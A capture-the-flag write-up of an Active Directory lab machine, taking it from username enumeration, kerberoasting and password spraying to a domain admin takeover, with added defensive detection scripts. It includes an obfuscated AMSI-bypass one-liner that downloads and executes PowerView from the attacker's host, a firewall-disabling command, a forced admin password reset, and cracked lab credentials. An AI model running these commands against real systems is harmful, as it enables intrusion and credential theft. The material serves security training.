# Search

## Nmap

```
sudo nmap 10.10.11.129 -p- -sS -sV

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-07-05 18:32:36Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
443/tcp   open  ssl/http      Microsoft IIS httpd 10.0
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
8172/tcp  open  ssl/http      Microsoft IIS httpd 10.0
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49675/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49676/tcp open  msrpc         Microsoft Windows RPC
49702/tcp open  msrpc         Microsoft Windows RPC
49716/tcp open  msrpc         Microsoft Windows RPC
49736/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: RESEARCH; OS: Windows; CPE: cpe:/o:microsoft:windows
```

### Kerbrute

Starting out we hit some valid usernames when running kerbrute against the target system. I was unable to proceed with the found usernames, so we move on to enumerating the web server.

```
kerbrute userenum '/usr/share/seclists/Usernames/xato-net-10-million-usernames.txt' --dc 10.10.11.129 --domain search.htb   
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FN1U9oB4Jb5Cr8UPDOmEV%2Fimage.png?alt=media\&token=5e971fd4-d9af-461e-ac6a-9b71078a497d)

Basic reconnaissance against the web server shows some team members who may have valid accounts within Active Directory.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FSDfi3bTi7yWk75yzqyJc%2Fimage.png?alt=media\&token=d362a499-f67a-4c55-a3d7-761ff55a9577)

The potential users have been listed below.

```
Keely Lyons
Dax Santiago
Sierra Frye
Kyla Stewart
Kaiara Spencer
Dave Simpson
Ben Thompson
Chris Stewart
```

As we are not aware of the naming convention used for Active Directory user accounts we need to generate a list of possible combinations.

### Username Generation

Username generation can be completed with usernamer. usernamer takes an input list of names and generates candidate account names based on likely naming conventions.

**URL:** <https://github.com/jseidl/usernamer>

```
python2 usernamer.py -f usernames -l >> usernames_AD.txt
```

After generating the usernames we run the new list through kerbrute, which reveals the naming convention of *Firstname.Surname*.

```
kerbrute userenum ~/Desktop/usernames_AD.txt --dc '10.10.11.129' --domain 'search.htb'
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F3aWgw5AweId1sOaOGiwx%2Fimage.png?alt=media\&token=a211e5f7-f7a3-48de-8fc9-f4edb1149302)

However, after multiple brute force attempts I was unable to proceed.

### Information within images

We head back over to the web server and, after some time, find that one of the displayed images contains credential information for an internal user.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FfdeFa24iNLhlttRmwcMa%2Fimage.png?alt=media\&token=da12657d-518d-42ba-8b1a-781661740da9)

Keywords identified are "Hope Sharp" and "IsolationIsKey?". Since we know the naming convention for this domain, we try the potential credentials with `crackmapexec`.

```
crackmapexec smb '10.10.11.129' -u hope.sharp -p 'IsolationIsKey?' -d 'search.htb'
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F4nWH0nWLniDk65bipIz4%2Fimage.png?alt=media\&token=49936d8f-bf8b-46b0-995d-82261f7763fa)

### Service Principal Names

With valid credentials we check for SPNs using Impacket's `GetUserSPNs.py` and pull a krb5tgs hash for the user *web\_svc*.

```
GetUserSPNs.py search.htb/hope.sharp:'IsolationIsKey?' -dc-ip '10.10.11.129' -request
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F4c4RYxEhHXuhNcgTK9XZ%2Fimage.png?alt=media\&token=22b9ea9d-eefd-443e-99a4-811a57e12a3d)

Using hashcat in mode 13100 we soon crack the hash with the `rockyou.txt` wordlist.

```
hashcat -a 0 -m 13100 hash.hash /usr/share/wordlists/rockyou.txt 
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FovNhliyMVHZ0ZgRWhJYw%2Fimage.png?alt=media\&token=08efefd0-1ee2-47a1-b8af-b1f4cf963b1b)

Credentials: `web_svc:@3ONEmillionbaby`
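The request above shows up on the domain controller as event 4769 (a TGS request) with ticket encryption type 0x17 (RC4-HMAC), which is exactly what hashcat mode 13100 consumes. The detection logic below is an added example, not part of the original writeup; the log lines are constructed and flattened to key=value pairs, and the field names follow the 4769 event schema.

```python
from collections import defaultdict

# Constructed sample Security-log lines (event 4769, TGS request) flattened to key=value pairs.
SAMPLE_LOG = """\
EventID=4769 TargetUserName=hope.sharp@SEARCH.HTB ServiceName=krbtgt TicketEncryptionType=0x12 IpAddress=::ffff:10.10.14.8
EventID=4769 TargetUserName=hope.sharp@SEARCH.HTB ServiceName=RESEARCH$ TicketEncryptionType=0x12 IpAddress=::ffff:10.10.14.8
EventID=4769 TargetUserName=hope.sharp@SEARCH.HTB ServiceName=web_svc TicketEncryptionType=0x17 IpAddress=::ffff:10.10.14.8
EventID=4769 TargetUserName=sierra.frye@SEARCH.HTB ServiceName=web_svc TicketEncryptionType=0x12 IpAddress=::ffff:10.10.11.50
EventID=4768 TargetUserName=hope.sharp@SEARCH.HTB ServiceName=krbtgt TicketEncryptionType=0x12 IpAddress=::ffff:10.10.14.8
"""

RC4_HMAC = "0x17"   # etype 23: the TGS encryption type that hashcat -m 13100 cracks

def parse_line(line):
    """Turn one flattened event line into a dict of its fields."""
    return dict(tok.split("=", 1) for tok in line.split())

def is_roast_candidate(ev):
    """4769 with an RC4 ticket for a user-account SPN (not krbtgt, not a computer account).
    Caveat: legacy services still pinned to RC4 match too, so baseline them before alerting."""
    svc = ev.get("ServiceName", "")
    return (ev.get("EventID") == "4769"
            and ev.get("TicketEncryptionType", "").lower() == RC4_HMAC
            and svc.lower() != "krbtgt"
            and not svc.endswith("$"))

def kerberoast_report(log_text):
    """Map requesting user -> sorted (service, client_ip) pairs for suspicious TGS requests."""
    hits = defaultdict(set)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = parse_line(line)
        if is_roast_candidate(ev):
            ip = ev.get("IpAddress", "").replace("::ffff:", "")
            hits[ev["TargetUserName"]].add((ev["ServiceName"], ip))
    return {user: sorted(pairs) for user, pairs in hits.items()}

if __name__ == "__main__":
    for user, pairs in kerberoast_report(SAMPLE_LOG).items():
        print(f"{user} requested RC4 service tickets for: {pairs}")
```

A burst of such requests from one account for many SPNs in a few seconds is the strongest signal, since the tooling requests every SPN at once; moving service accounts to AES-only (and long random passwords) removes the crackable RC4 ticket in the first place.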

### Password Spraying

I tested for some time with the web\_svc account and was unable to progress anywhere meaningful. Spraying the password against all known users (who have been enumerated with valid credentials) we get a hit for *edgar.jacobs*.

```
crackmapexec smb '10.10.11.129' -u ~/Desktop/users -p '@3ONEmillionbaby' --continue-on-success
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F8pY0WJUgaMZZWEATqgCM%2Fimage.png?alt=media\&token=d0799e70-b869-47e4-b3bf-7bd0ff559ab8)

Credentials: `edgar.jacobs:@3ONEmillionbaby`
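From the domain controller's side, the spray above is one source address failing against many different accounts in a short window, followed by a single success. The detector below is an added example (not from the writeup), written against constructed DC events; the event IDs are the standard ones (4625 failed logon, 4771 Kerberos pre-auth failure, 4624 successful logon).

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample DC events: (timestamp, event_id, target_user, source_ip).
SAMPLE_EVENTS = [
    ("2022-07-05T18:40:01", 4625, "keely.lyons",   "10.10.14.8"),
    ("2022-07-05T18:40:02", 4625, "dax.santiago",  "10.10.14.8"),
    ("2022-07-05T18:40:02", 4625, "sierra.frye",   "10.10.14.8"),
    ("2022-07-05T18:40:03", 4625, "kyla.stewart",  "10.10.14.8"),
    ("2022-07-05T18:40:03", 4624, "edgar.jacobs",  "10.10.14.8"),  # the single hit
    ("2022-07-05T18:40:04", 4625, "ben.thompson",  "10.10.14.8"),
    ("2022-07-05T18:40:05", 4625, "chris.stewart", "10.10.14.8"),
    # One user mistyping their own password three times is not a spray.
    ("2022-07-05T18:41:00", 4625, "dave.simpson",  "10.10.11.50"),
    ("2022-07-05T18:41:30", 4625, "dave.simpson",  "10.10.11.50"),
    ("2022-07-05T18:42:00", 4625, "dave.simpson",  "10.10.11.50"),
]

FAILURE_IDS = {4625, 4771}

def detect_spray(events, window=timedelta(minutes=5), min_users=5):
    """Return {source_ip: {"attempted": [...], "succeeded": [...]}} for every source that
    failed against at least min_users distinct accounts inside a single sliding window."""
    by_src = defaultdict(list)
    for ts, eid, user, src in events:
        by_src[src].append((datetime.fromisoformat(ts), eid, user.lower()))
    alerts = {}
    for src, items in by_src.items():
        items.sort()
        failed = [(t, u) for t, e, u in items if e in FAILURE_IDS]
        sprayed, start = set(), 0
        for end in range(len(failed)):               # sliding window over failures only
            while failed[end][0] - failed[start][0] > window:
                start += 1
            users = {u for _, u in failed[start:end + 1]}
            if len(users) >= min_users:
                sprayed |= users
        if sprayed:
            # Any successful logon from a spraying source is a likely compromised account.
            succeeded = {u for _, e, u in items if e == 4624}
            alerts[src] = {"attempted": sorted(sprayed), "succeeded": sorted(succeeded)}
    return alerts

if __name__ == "__main__":
    for src, info in detect_spray(SAMPLE_EVENTS).items():
        print(f"{src}: sprayed {len(info['attempted'])} accounts, successes: {info['succeeded']}")
```

The threshold and window are tuning knobs: a slow spray of one attempt per account per hour will only be caught with a wider window, which is why distinct-account counting (rather than raw failure counting) is the metric that matters.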

### Protected Worksheets

Using these credentials against SMB with smbmap we recursively list all available shares.

```
smbmap -H '10.10.11.129' -u 'edgar.jacobs' -p '@3ONEmillionbaby' -d 'search.htb' -R
```

Under Edgar's Desktop in the redirected folders share we see "Phishing\_Attempt.xlsx".

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fy3K5HEdyL76wVbn35lca%2Fimage.png?alt=media\&token=ad52c5cc-3c29-412a-8e96-c67728062e1a)

Using smbmap we download the file of interest.

```
smbmap -H '10.10.11.129' -u 'edgar.jacobs' -p '@3ONEmillionbaby' -d 'search.htb' -R -A xlsx
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FvjmRHbOsvCKz4ULpDX3u%2Fimage.png?alt=media\&token=64b1b920-ef26-48ac-a3ce-36e8f7da320b)

Opening the Phishing\_Attempt.xlsx file we see that under the worksheet "passwords" column "C" is missing, and that the worksheet is password protected.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FqGzmCxfK3KF3pU4AzhIM%2F2022-07-14%2012_24_34-10.10.11.129-RedirectedFolders_edgar.jacobs_Desktop_Phishing_Attempt.xlsx%20-%20Exce.png?alt=media\&token=e7558f5e-d238-40f9-aa20-65519eecd2c6)

Some research shows there are various ways of removing the worksheet protection when the password is not known:

**URL:** <https://www.ablebits.com/office-addins-blog/protect-unprotect-excel-sheet-password/#unlock-excel-spreadsheet-vba>

I opted for the copy and paste method, where you highlight all cells and simply paste into a new worksheet, revealing the passwords as shown below.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FbauQSY0Bkp8eXgl6ntvl%2F2022-07-14%2012_26_02-10.10.11.129-RedirectedFolders_edgar.jacobs_Desktop_Phishing_Attempt.xlsx%20-%20Exce.png?alt=media\&token=c890b142-a9d2-42b5-988c-8184c8e8f361)
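The reason copy and paste works is that worksheet protection is an editing lock, not encryption: an .xlsx is a zip archive, and the protection is a `sheetProtection` element in the sheet's XML next to cell values stored in cleartext (the legacy `password` attribute is only a 16-bit hash). The snippet below is an added example, not part of the writeup; it builds a constructed stand-in for the "passwords" sheet with a hidden column C and reads everything back, which is the check a reviewer would run before treating a protected sheet as a safe place for credentials.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

NS = {"s": "http://schemas.openxmlformats.org/spreadsheetml/2006/main"}

# Constructed sheet: protected, column C hidden, values as inline strings so no sharedStrings part is needed.
SHEET_XML = """<?xml version="1.0" encoding="UTF-8"?>
<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">
  <sheetProtection sheet="1" objects="1" scenarios="1" password="CC1A"/>
  <cols><col min="3" max="3" width="0" hidden="1"/></cols>
  <sheetData>
    <row r="1"><c r="A1" t="inlineStr"><is><t>Username</t></is></c><c r="C1" t="inlineStr"><is><t>Password</t></is></c></row>
    <row r="2"><c r="A2" t="inlineStr"><is><t>sierra.frye</t></is></c><c r="C2" t="inlineStr"><is><t>example-password-1</t></is></c></row>
  </sheetData>
</worksheet>"""

def build_xlsx():
    """Zip the constructed sheet the way an .xlsx stores it (only the part we inspect)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("xl/worksheets/sheet1.xml", SHEET_XML)
    return buf.getvalue()

def inspect_sheet(xlsx_bytes, part="xl/worksheets/sheet1.xml"):
    """Return the protection attributes, hidden column numbers and every cell value in cleartext."""
    with zipfile.ZipFile(io.BytesIO(xlsx_bytes)) as z:
        root = ET.fromstring(z.read(part))
    prot = root.find("s:sheetProtection", NS)
    hidden = [int(c.get("min")) for c in root.iterfind("s:cols/s:col", NS) if c.get("hidden") == "1"]
    cells = {c.get("r"): c.findtext("s:is/s:t", default="", namespaces=NS)
             for c in root.iterfind(".//s:c", NS)}
    return {
        "protected": prot is not None,
        "protection": dict(prot.attrib) if prot is not None else {},
        "hidden_cols": hidden,
        "cells": cells,
    }

if __name__ == "__main__":
    info = inspect_sheet(build_xlsx())
    print("protected:", info["protected"], info["protection"])
    print("hidden columns:", info["hidden_cols"])
    for ref, value in info["cells"].items():
        print(f"{ref} = {value!r}")
```

Only workbook-level encryption ("Encrypt with Password", which wraps the whole package in an encrypted OLE container) keeps the cell contents out of reach; sheet protection and hidden columns do neither.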

### Password Spraying #2

Spraying the password list against the list of known users we get a hit for Sierra.Frye.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F81ByXKUsJEzli5MKXqZr%2Fimage.png?alt=media\&token=57821ec6-36d7-461b-aabf-c6e10e2e3edc)

Credentials:

```
sierra.frye:$$49=wide=STRAIGHT=jordan=28$$18
```

### Bloodhound

With valid credentials we can perform BloodHound enumeration externally with BloodHound.py.

**GitHub:** <https://github.com/fox-it/BloodHound.py>

```
python3 bloodhound.py -u 'sierra.frye' -p '$$49=wide=STRAIGHT=jordan=28$$18' -ns '10.10.11.129' -d 'search.htb'
```

After completing the BloodHound enumeration the results are uploaded to the console and reviewed. We see we are a member of the "Remote Management Users" group.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FrvokK80RPOr3p3RGPEaE%2Fimage.png?alt=media\&token=03e1de30-c2a7-47f4-bc37-fba89a2f72e0)

No luck: WinRM is not running externally on the target system.

### GMSAPassword

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FKI9C6eo2mr5WxEdlFU8w%2Fimage.png?alt=media\&token=01b75fc8-6942-4ea4-8e6b-7b0e802a3905)

Further enumeration shows effective members of the group *ITSEC* have the ability to read the GMSA password of *BIR-ADFS-GMSA*.

gMSADumper is a Python script that can be used to read the **msDS-ManagedPassword** attribute and decrypt it with the **msDS-ManagedPasswordID** attribute.

**gMSADumper:** <https://github.com/micahvandeusen/gMSADumper>

```
python3 gMSADumper.py -u 'sierra.frye' -p '$$49=wide=STRAIGHT=jordan=28$$18' -d search.htb -l 10.10.11.129
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fi5sZoipYGs5kZPclqoRd%2Fimage.png?alt=media\&token=46d24da8-9351-4b77-ab0f-d9f7f18506b4)

After successfully reading and decrypting the GMSA password we are left with the following credentials: `BIR-ADFS-GMSA$:::e1e9fd9e46d0d747e1595167eedcec0f`

However, from here I was unable to proceed with the credentials.
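What gMSADumper reads back is an MSDS-MANAGEDPASSWORD_BLOB: a small little-endian header of offsets followed by the current (and optionally previous) password as a null-terminated UTF-16 string and two rotation intervals in 100 ns ticks. The domain controller only returns this attribute over an encrypted LDAP connection to principals listed in msDS-GroupMSAMembership, which is why the *ITSEC* membership matters and why that attribute is the thing to audit. The encoder and parser below are an added example (not the tool's code); the encoder exists only so the parser can be exercised offline, and the password strings are constructed placeholders.

```python
import struct

# MSDS-MANAGEDPASSWORD_BLOB header (MS-ADTS 2.2.19), little-endian: Version, Reserved, Length,
# CurrentPasswordOffset, PreviousPasswordOffset, QueryPasswordIntervalOffset, UnchangedPasswordIntervalOffset.
HEADER = struct.Struct("<HHIHHHH")
TICKS_PER_SECOND = 10_000_000          # intervals are stored in 100 ns units

def build_blob(current, previous=None, query_interval=86400, unchanged_interval=86400):
    """Constructed encoder (intervals in seconds). Real gMSA passwords are 128 random
    UTF-16 code units, which is why tools report the NT hash rather than the text."""
    cur = current.encode("utf-16-le") + b"\x00\x00"
    prev = previous.encode("utf-16-le") + b"\x00\x00" if previous else b""
    body = cur + prev
    body += b"\x00" * ((-(HEADER.size + len(body))) % 8)      # AlignmentPadding to 8 bytes
    cur_off = HEADER.size
    prev_off = HEADER.size + len(cur) if previous else 0
    q_off = HEADER.size + len(body)
    intervals = struct.pack("<QQ", query_interval * TICKS_PER_SECOND,
                            unchanged_interval * TICKS_PER_SECOND)
    return HEADER.pack(1, 0, q_off + 16, cur_off, prev_off, q_off, q_off + 8) + body + intervals

def _wstr(blob, off):
    """Read a null-terminated UTF-16-LE string, stepping two bytes at a time."""
    end = off
    while blob[end:end + 2] != b"\x00\x00":
        end += 2
        if end >= len(blob):
            raise ValueError("unterminated UTF-16 string in blob")
    return blob[off:end].decode("utf-16-le")

def parse_blob(blob):
    """Decode the header and pull out passwords and rotation intervals (seconds)."""
    version, _, length, cur_off, prev_off, q_off, u_off = HEADER.unpack_from(blob)
    if version != 1 or length != len(blob):
        raise ValueError("not a version-1 MSDS-MANAGEDPASSWORD_BLOB")
    return {
        "current_password": _wstr(blob, cur_off),
        "previous_password": _wstr(blob, prev_off) if prev_off else None,
        "query_interval_s": struct.unpack_from("<Q", blob, q_off)[0] // TICKS_PER_SECOND,
        "unchanged_interval_s": struct.unpack_from("<Q", blob, u_off)[0] // TICKS_PER_SECOND,
    }

if __name__ == "__main__":
    print(parse_blob(build_blob("example-current", "example-previous", 3600, 2592000)))
```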

### Certificates

Going back to further enumeration we use `smbmap` to list available shares using Sierra's credentials and find some certificate files within the redirected folders share.

```
smbmap -H '10.10.11.129' -u 'sierra.frye' -p '$$49=wide=STRAIGHT=jordan=28$$18' -d 'search.htb' -R -A "p12"
smbmap -H '10.10.11.129' -u 'sierra.frye' -p '$$49=wide=STRAIGHT=jordan=28$$18' -d 'search.htb' -R -A "pfx" 
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FL9z5RieyyHlWF13bGuJ5%2Fimage.png?alt=media\&token=656772f3-f50b-47f0-a45c-a6a7de726e53)

After downloading we are prompted for a password on the `.pfx` file.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fa1pZ7K0ETjaTm7BngLE7%2Fimage.png?alt=media\&token=0d27f182-3dd5-4e58-aba9-183131dec48c)

`pfx2john` is used to convert the file to a hash usable by `john`.

```
/usr/bin/pfx2john ~/10.10.11.129-RedirectedFolders_sierra.frye_Downloads_Backups_staff.pfx >> pfxhash.hash
```

Cracking the hash:

```
sudo john --wordlist=/usr/share/wordlists/rockyou.txt pfxhash.hash 
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fv8BPDZymypigMgt5haGM%2Fimage.png?alt=media\&token=d15f3a9a-6238-4afe-ada2-9258cbbaba72)

We can now import the certificate file into Firefox. A password prompt completes the import, where we provide the same password cracked above.

### PowerShell Web Access

Moving over to the `/staff` web page we are given the opportunity to provide the certificate file.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fn5wjYva5v8NVIkZICIM6%2Fimage.png?alt=media\&token=d9f9a62b-ccee-442e-a804-4fe63592ef23)

We are then taken to a PowerShell Web Access console. Logging in with Sierra's credentials and the computer name "research" allows logon.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FjbwVvxz355moLoLeQ2cD%2Fimage.png?alt=media\&token=b56d96a8-77d2-475d-bf4a-16e4b35ca80b)

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FiBoKhxZXV7BeHmt5xfgc%2Fimage.png?alt=media\&token=5f15b7be-1e91-4584-aec2-71d333ecab27)

### User.txt

We are then able to grab the `user.txt` flag.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fs2vDeAiyBfXRApyxIPcW%2Fimage.png?alt=media\&token=cb2f8d5d-0bf9-4cac-a960-ff253ff914d1)

### Lateral Movement with PowerShell

I was unable to find a method of privilege escalation as Sierra, and BloodHound was not providing any paths for potential escalation.

I decided to proceed with gaining command execution as *BIR-ADFS-GMSA$* using PowerShell remoting.

Even though we already have the credentials for `BIR-ADFS-GMSA$`, I used the following PowerShell snippet from the link below to build a credential variable from the GMSA read ability for use with `Invoke-Command`.

**URL:** <https://www.thehacker.recipes/ad/movement/dacl/readgmsapassword>

```
# ConvertFrom-ADManagedPasswordBlob comes from the DSInternals module; Get-ADServiceAccount from the AD module
$mp = (Get-ADServiceAccount -Identity 'BIR-ADFS-GMSA' -Properties 'msDS-ManagedPassword').'msDS-ManagedPassword'
$cred = new-object system.management.automation.PSCredential "search.htb\BIR-ADFS-GMSA",(ConvertFrom-ADManagedPasswordBlob $mp).SecureCurrentPassword
Invoke-Command -ComputerName $env:computername -Credential $cred -ScriptBlock {whoami}
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FtVPimyD66eymZjJjNQRI%2Fimage.png?alt=media\&token=22bf91fe-5113-443e-a602-5225fc49025d)

### Invoke-ACLScanner

Whilst working as BIR-ADFS-GMSA$ I then bypassed AMSI and ran PowerView's Invoke-ACLScanner to look for ACLs of interest.

```
Invoke-Command -computername research -Credential $cred -ScriptBlock {S`eT-It`em ( 'V'+'aR' +  'IA' + ('blE:1'+'q2')  + ('uZ'+'x')  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    Get-varI`A`BLE  ( ('1Q'+'2U')  +'zX'  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em')  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile')  ),(  "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} ); iex (iwr -usebasicparsing http://10.10.14.8:8000/powerview.ps1);Invoke-ACLScanner -ResolveGUIDs | out-file c:\redirectedfolders\Output.txt }
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FOhTHmHBmglJzNdbCTMwm%2Fimage.png?alt=media\&token=5900bb9e-b972-42f4-8edd-0dc62fecb4ab)

Looking through the results we see that `BIR-ADFS-GMSA$` has GenericAll privileges over the user Tristan.Davies, who is a Domain Administrator. Weird how this attack path was not picked up by BloodHound.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FgXiiAvHMSIumESi3ffcN%2Fimage.png?alt=media\&token=55cca38a-f432-4e5f-86a3-76091a3aec7e)

As we have GenericAll over Tristan.Davies we can change the user's password.

```
Invoke-Command -computername research -Credential $cred -ScriptBlock {net user /domain tristan.davies Password123}
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F4ydVYYrVGOTw484Glcyr%2Fimage.png?alt=media\&token=ab0da5cc-cc1d-4894-8099-428286f0a4b6)

To gain full shell access I disabled the firewall with our now acquired Domain Administrator account.

```
crackmapexec smb '10.10.11.129' -u 'Tristan.Davies' -p 'Password123' -d 'search.htb'  -x 'netsh advfirewall set allprofiles state off'
```

Check that WSMan is now reachable with `Nmap`.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FlcDej7WsGhV0zCfkY84h%2Fimage.png?alt=media\&token=19d0818a-15f3-45b2-9efb-a72c0717ffd4)

### root.txt

We then log in with `Evil-WinRM`.

```
evil-winrm -i '10.10.11.129' -u 'Tristan.Davies' -p 'Password123'
```

Then we grab the `root.txt` flag.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Ft29a6xeVVGuJiqIQ1AxU%2Fimage.png?alt=media\&token=38d7a2b5-7416-4b82-b923-c1f499d4895c)
